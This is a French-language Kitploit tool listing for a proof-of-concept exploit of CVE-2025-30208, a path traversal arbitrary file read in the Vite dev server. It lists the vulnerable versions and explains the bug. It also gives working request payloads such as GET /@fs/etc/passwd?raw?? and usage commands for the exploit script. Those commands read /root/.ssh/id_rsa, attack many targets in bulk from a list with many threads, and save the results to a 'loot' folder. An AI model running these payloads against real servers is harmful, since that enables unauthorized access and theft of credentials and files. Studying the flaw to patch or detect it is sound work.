Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — Un PoC du script d'exploitation pour la vulnérabilité de lecture arbitraire de fichiers de Vite /@fs/ Path Traversal dans transformMiddleware (CVE-2025-30208). | Kitploit
Outils/GitHubGitHub/4xura/cve-2025-30208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHub4xura/cve-2025-30208

CVE-2025-30208

Un PoC du script d'exploitation pour la vulnérabilité de lecture arbitraire de fichiers de Vite /@fs/ Path Traversal dans transformMiddleware (CVE-2025-30208).

Voir le dépôt
1051il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-30208

Un PoC du script d'exploitation pour la vulnérabilité Arbitrary File Read (lecture arbitraire de fichiers) de Vite /@fs/ Path Traversal (parcours de chemin) dans transformMiddleware (CVE-2025-30208). Une analyse détaillée est disponible dans cet article.

Versions vulnérables antérieures à :

  • 6.2.3
  • 6.1.2
  • 6.0.12
  • 5.4.15
  • 4.5.10

Aperçu

Vite est un projet open-source populaire disponible sur Github et son site officiel. Il utilise un préfixe spécial, @fs, pour permettre un accès direct aux chemins absolus de fichiers en mode développement :

root@kitploit:~
GET /@fs/<absolute/path/to/file>

Mais pour prévenir les abus, Vite limite ce qui peut être accédé via @fs en utilisant une configuration comme :

root@kitploit:~
server: {
  fs: {
    allow: [path.resolve(__dirname, 'src')]
  }
}

Donc en théorie, les fichiers en dehors du répertoire autorisé (comme /etc/passwd) devraient être bloqués — même si quelqu'un essaie d'utiliser des astuces comme ../../../.

Cependant, le défaut réside dans la manière dont Vite analyse et vérifie les URLs (via le middleware/fonction transformMiddleware). Le middleware/fonction utilise ensureServingAccess(url, ...) pour vérifier si une requête de fichier via /@fs/ est autorisée.

Cependant, un attaquant pourrait forger une requête avec des séparateurs de requête en suffixe dans l'URL comme :

root@kitploit:~
GET /@fs/etc/passwd?raw??
GET /@fs/etc/passwd?raw&url
GET /@fs/etc/passwd?import&raw??

Ces formes permettraient de contourner les filtres d'expression régulière (rawRE, urlRE) et les vérifications de sécurité car la chaîne de requête malformée correspond toujours à la logique de routage. Ce qui se passe :

  1. Le chemin est /@fs/../../../etc/passwd
  2. La chaîne de requête est raw?? (délibérément malformée)
  3. En interne, Vite essaie de supprimer ou normaliser les caractères de fin comme ?, et cela se fait avant de vérifier si le chemin du fichier est autorisé.
  4. Cependant, la vérification ne parvient pas à analyser et à faire correspondre correctement la chaîne de requête, donc la logique de liste blanche ne s'applique pas.

Cela signifie :

  • La requête contourne la vérification server.fs.allow.
  • Vite la traite comme une demande d'accès aux fichiers valide.
  • Et il lit et retourne des fichiers arbitraires comme /etc/passwd, s'il existe.

Utilisation du PoC

Utilisation de base

root@kitploit:~
python3 poc.py [OPTIONS]

Options

Indicateur / OptionDescription
-u, --urlURL d'une seule cible (ex. example.com:5173)
-f, --fileFichier contenant une liste de cibles (une URL par ligne)
-p, --pathChemin du système de fichiers à lire (défaut : /etc/passwd)
-b, --bypassChaîne de requête pour contourner la validation de routage (défaut : ?raw??)
--proxyURL du proxy (ex. http://127.0.0.1:8080)
-o, --outputRépertoire de sortie pour enregistrer les résultats d'exploitation (défaut : results)
-t, --threadsNombre de threads pour le mode batch (défaut : 10)
-h, --helpAfficher le message d'aide et quitter

Exemples

Exploitation d'une seule cible :

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173

Cible unique avec un chemin LFI personnalisé pour fuiter le fichier souhaité :

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'

Exploitation par lots avec plusieurs cibles :

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt

Requête de contournement personnalisée :

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"

Utilisation d'un proxy (ex. Burp Suite) :

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080

Répertoire de sortie personnalisé :

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -o ./loot

Augmenter le nombre de threads en mode batch :

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt -t 50
Télécharger l’outil